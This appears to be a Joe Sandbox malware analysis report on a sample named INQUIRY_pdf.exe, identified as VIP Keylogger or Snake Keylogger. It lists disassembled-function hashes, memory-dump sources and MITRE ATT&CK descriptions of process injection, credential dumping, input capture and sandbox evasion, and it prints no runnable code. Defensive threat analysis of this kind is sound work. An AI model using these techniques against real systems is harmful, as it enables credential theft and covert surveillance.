Snapshot File: hcaresult_4_2_dbd000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82485b5bee23076faf21f3a65d840db1ba0590d1b3d5fbc0f2328390e0800308
Instruction ID: 881b53862868cdbc776648b6904c07e4cd8bea4feab7b3a48903fcccf8c25f38
Opcode Fuzzy Hash: 82485b5bee23076faf21f3a65d840db1ba0590d1b3d5fbc0f2328390e0800308
Instruction Fuzzy Hash: 59312F7550E3C09FD703DB24C990751BF71AB47214F1985DBD889CF1A7C23A980ACB62

Function 01086300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 034cc6accf268db8d3f6de9da2267fab4bab78218ef431a0c4135462480625e5
Instruction ID: 889c23e1575b2533d258ebe22529b7c07e1616fa067fb253b09cc689fb13e142
Opcode Fuzzy Hash: 034cc6accf268db8d3f6de9da2267fab4bab78218ef431a0c4135462480625e5
Instruction Fuzzy Hash: 40210531304A119FC725AB29D45492EB7A2FFC97527058079E986CB368CF32DC028B90

Function 00DBD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160707734.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_dbd000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddb9ffb1bd19674ad880b1631c4ab96615f17ea4a3600a6466adecde10c188cd
Instruction ID: 297cf3cf9469ad10d8e64a917bc586ea058de3afbe161508e320c0f84b6e45ce
Opcode Fuzzy Hash: ddb9ffb1bd19674ad880b1631c4ab96615f17ea4a3600a6466adecde10c188cd
Instruction Fuzzy Hash: 5F2104B1504204EFCB14EF24C9C0B66BB66FB84314F24C96DE94A4B292D73AD846DB71

Function 01085649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75cf10709a2afaacd225c72e48ad7a0000106f57d165a28376e7d71faf350dbb
Instruction ID: 96c1363e1f28eb24ec5e6cc40cfd2da1c0fc54253f5ed7d021ee3388b7175af0
Opcode Fuzzy Hash: 75cf10709a2afaacd225c72e48ad7a0000106f57d165a28376e7d71faf350dbb
Instruction Fuzzy Hash: AE2108316091489FCB15BF68E85466E3FA2FF49315F008469F4C68B355C775CE65CBA0

Function 01084285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3da47d7669f4fe94e470868c5a9dacb272a334a8171c6a2b963ac0c7e11a13de
Instruction ID: f5ecb821c8f357d6ed20bb764cae67d561bda0841b1275dbbbe8731befdc2b4f
Opcode Fuzzy Hash: 3da47d7669f4fe94e470868c5a9dacb272a334a8171c6a2b963ac0c7e11a13de
Instruction Fuzzy Hash: 3431A678E11309CFCB44EFA8E58499DBBB6FF49301B209469E819AB369D735AD05CF00

Function 0108AEF0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01bf7f17ad616b3b321056ee3e48cdd5c1da233f3e0e8b8e837f60af903f5fee
Instruction ID: 9902a77cb5f43a56a19bf134fac1c1bcd648910ae17f3990edb4c4541073b9e5
Opcode Fuzzy Hash: 01bf7f17ad616b3b321056ee3e48cdd5c1da233f3e0e8b8e837f60af903f5fee
Instruction Fuzzy Hash: CD219372B00604DFCB149F98D844AEDBBF5FB8C310F144066E945A7391DA729C01CB90

Function 01089761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db3fae72c415699978c10b93c860ae54e45657d3f6043c4a40c31fc29cf44ad9
Instruction ID: 5fb692496578f61b62e279cb0eb630444ec327f8cd1d0276b1793da0aa0e7ed9
Opcode Fuzzy Hash: db3fae72c415699978c10b93c860ae54e45657d3f6043c4a40c31fc29cf44ad9
Instruction Fuzzy Hash: 51218D70E04249EFDB15EFA5D590AEDBFB6EF88308F148059E481E6295DB30D941CB20

Function 0108F312 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dad6b6edcc7e04609f4d094dd366c6c1d5db499801046011edf760dccfdfced8
Instruction ID: b5cd1967b958e038e3d4a3da300520cd9a40b60e2d3c3ff4a7be4881bb7bb2fc
Opcode Fuzzy Hash: dad6b6edcc7e04609f4d094dd366c6c1d5db499801046011edf760dccfdfced8
Instruction Fuzzy Hash: C0216FB0D04209DFCB44EFB8D94069EBFF1FB42300F10D6AAE055AB265EB704A46DB91

Function 010862F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70fe73d4213544e3e87d253052054f7b96a8a11381902a62328db29562ed80fa
Instruction ID: a3b001021cb6b879b5e053500a75a35d7b2df342bb56144337d77446f5d4dfbe
Opcode Fuzzy Hash: 70fe73d4213544e3e87d253052054f7b96a8a11381902a62328db29562ed80fa
Instruction Fuzzy Hash: 8711A331709A119FD7166B29D46452E7BA2FFC575231980B9E5C6CB368CF32DC028B90

Function 010827F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edcaf95de8edc6a51324f79b84b0e591d80498e2a4186cca2389fa216bf2feaa
Instruction ID: eb93c163df03f1609145d83e83e8ebfe0e4d5c04ea4af32bd6e0a0fa1170c45c
Opcode Fuzzy Hash: edcaf95de8edc6a51324f79b84b0e591d80498e2a4186cca2389fa216bf2feaa
Instruction Fuzzy Hash: 5B21DE74D0560ACFCB00EFA9D9445EEBFF4EF0A304F10456AD845B7224EB315A84CBA1

Function 00DAD54F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160662363.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_dad000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: 267158b6f06463fdf39498da6583a5afc05fbe3a9aab273e06e2ed57f4f33109
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: 3811E976504284CFCF15CF14D5C4B16BF72FB95314F28C5A9D80A4B656C33AD456CBA2

Function 0108F320 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b8fdfc30dada3d849e54b62dcb32e6e854692dfdcbbd01b344b8c63c7ff4d3c
Instruction ID: f48f944e665b04d8bdf6c8a674bcd7eda36bee6ec6b302ff9e210b64a5d17a08
Opcode Fuzzy Hash: 1b8fdfc30dada3d849e54b62dcb32e6e854692dfdcbbd01b344b8c63c7ff4d3c
Instruction Fuzzy Hash: 2E114FB0D00209DFCB44EFA8D94079EBFF2FB45300F10D5A9E014A7255EB705A46CB91

Function 01085E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bf52d24f825f04e9a6d9ad416f2c3648e05fb6ab6b1a78eb86d5e93cf3bc392
Instruction ID: 13103722f0c14cdcc28b58c483c023a36751233436c628607177e31831ca1693
Opcode Fuzzy Hash: 8bf52d24f825f04e9a6d9ad416f2c3648e05fb6ab6b1a78eb86d5e93cf3bc392
Instruction Fuzzy Hash: 35014C327042046FCB169E989C10AEF3FE7EBC9350F048056F984CB284DD768D1297A0

Function 0108E8E8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5dd2f490215fe6da0140de232e5235b08e597577baf9abd6264b158535e98df
Instruction ID: 8181a813e685863bdf948e27c7caf1deed58c51cf5f2cc102235fc959066b01f
Opcode Fuzzy Hash: b5dd2f490215fe6da0140de232e5235b08e597577baf9abd6264b158535e98df
Instruction Fuzzy Hash: 9E116978D0820ADFCF41DFA8D8449AEBBB1FB4A300F108066E910E3364D7385A56DF90

Function 0108ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9a39b09fe9c801f41133b18e95bb1543bf66169267591a4daf8416d5d8074fe
Instruction ID: e8fa33f080b5b080af7ade5c39b8309cf77a8f136da9c1ba6b66e86efa8a55e1
Opcode Fuzzy Hash: d9a39b09fe9c801f41133b18e95bb1543bf66169267591a4daf8416d5d8074fe
Instruction Fuzzy Hash: 88F0FC313046148F97257A2E985472A76DEEFC8A5134540BBE5C5C7766EE21CC02C380

Function 01089C29 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b979eeba5d8600795903a58d38d7d85722fab35b60fff47faceb85a931dabf
Instruction ID: 9e3141a7f146cd661fb8b9aacf8958ec3f37c253284a13bb020e5a8c02ad6ee9
Opcode Fuzzy Hash: 30b979eeba5d8600795903a58d38d7d85722fab35b60fff47faceb85a931dabf
Instruction Fuzzy Hash: B0F08276A002189FDF54EF59D804AFEBBF5EBD8325F01C026E948C3214D73149159B91

Function 010828A2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c606075200310e3c3b3a91ae452091a7f093edea54a6f3f6748069493137b5c9
Instruction ID: 6923142fb0934a356129938ae9a000e8da401ca92e2095c727dfcbe55a0333b0
Opcode Fuzzy Hash: c606075200310e3c3b3a91ae452091a7f093edea54a6f3f6748069493137b5c9
Instruction Fuzzy Hash: FDE0D831D243668BCB02D7749C500DDBB34EE972117584997C86077161E7312668C7A1

Function 01086739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6d919b116187d0b6bc7736926a9033b8252f5283f65a6b80bce72cbcd6e0add
Instruction ID: 261fde4f5ecb2555b1553e96190d59714f9cb79c2bedb23490c962363ab16a46
Opcode Fuzzy Hash: c6d919b116187d0b6bc7736926a9033b8252f5283f65a6b80bce72cbcd6e0add
Instruction Fuzzy Hash: D2E0C2310083C50FCB03B770ACA40897F2ADE43300B44A8A5F0444A06FDD651946A371

Function 010828B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85b77bae4753f576bb6d29d9c0854c52736998b9fec077d83b7150ba7dbf5f5a
Instruction ID: eef81e55a18710681684a9a98b29a2baeac054be9c35fad894fcd2d0b64e3e16
Opcode Fuzzy Hash: 85b77bae4753f576bb6d29d9c0854c52736998b9fec077d83b7150ba7dbf5f5a
Instruction Fuzzy Hash: 76D05B35D2022B97CB01E7A5EC044DFF738EED6261B544626D91437154FB702659C6F1

Function 0108D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c59c2e375f9a1f80993a128872e1000590a4a5b060d7f6fa0a59435ef676b706
Instruction ID: 6e4dae21c4df39a8b5c9bf46990cb44dfd870d154d7ec9ce8c0455ac6b5c8b93
Opcode Fuzzy Hash: c59c2e375f9a1f80993a128872e1000590a4a5b060d7f6fa0a59435ef676b706
Instruction Fuzzy Hash: 1AD04275E1450DCBCB30DFA8E4844DCBB71EF89325B10542AD965A3292DA355455CF11

Function 0108AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3558a3a35b1524270a790b41dfc4957002de02278ce5fe9b6902b7467cb2830
Instruction ID: e7a28f5ba218ab6faff3872a3305c44e4f6677ed4202bbf616f153f14e371f94
Opcode Fuzzy Hash: d3558a3a35b1524270a790b41dfc4957002de02278ce5fe9b6902b7467cb2830
Instruction Fuzzy Hash: 74D0673AB400189FCB149F98E8808DDF776FB98221B448116EA15A3265C6319925DB90

Function 01086748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75ca6181ddd607080d3703b84deccb6db67592d97703c6c82ee927a5c154d09b
Instruction ID: 95ca2608a5b69132b0dcdcf93aef213f57bac2da3f5d661ae14922da852bff3c
Opcode Fuzzy Hash: 75ca6181ddd607080d3703b84deccb6db67592d97703c6c82ee927a5c154d09b
Instruction Fuzzy Hash: 2FC080300043084BC605F775FCC5515775FEFC0301740DD34B0050A56DDE74198657B1

Non-executed Functions

Function 0108F644 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3636960cb52d0bc103cf32adf3485b1c755aa9bfe650a3ce45998b7cc700252b
Instruction ID: e9f54d5a7446fa1742c8afbe87dfb36d7f50e99bbcf8ed255490b1c2d5545de7
Opcode Fuzzy Hash: 3636960cb52d0bc103cf32adf3485b1c755aa9bfe650a3ce45998b7cc700252b
Instruction Fuzzy Hash: 7DC1A174E01219CFDB54DFA9C984B9DBBB2FF89300F2081A9D449AB355DB359A86CF10

Function 0108FA9C Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 122c6048a8ab5423e51d8670153bc0c9bbba1e8750646cde75e6067c4b13428c
Instruction ID: 91597a952d7fd6980e0c5b9c3a34a4920b3ce30994a3473c2bdc7a007509a70b
Opcode Fuzzy Hash: 122c6048a8ab5423e51d8670153bc0c9bbba1e8750646cde75e6067c4b13428c
Instruction Fuzzy Hash: 87C19074E00219CFDB54DFA5C994B9DBBB2FF89300F2081A9D449AB355DB359A82CF10

Function 01086920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;fq, xrefs: 0108692C
\;fq, xrefs: 01086936
\;fq, xrefs: 0108695E
\;fq, xrefs: 01086952

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: \;fq$\;fq$\;fq$\;fq
API String ID: 0-4080798596
Opcode ID: 280c5f0b3ddbde592adc9d6b6ad184bf76adc4877b32b2d54bd0f6eb2e558e29
Instruction ID: 5ade502eba606b5790e89ffc7944c1dc65bbf52db2a903044026c917458f3598
Opcode Fuzzy Hash: 280c5f0b3ddbde592adc9d6b6ad184bf76adc4877b32b2d54bd0f6eb2e558e29
Instruction Fuzzy Hash: 4701D431B181048FCB60AE2CC440A6A7BEEAF9877071640A9E5C9CB3F1DF32DC418740

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report INQUIRY_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

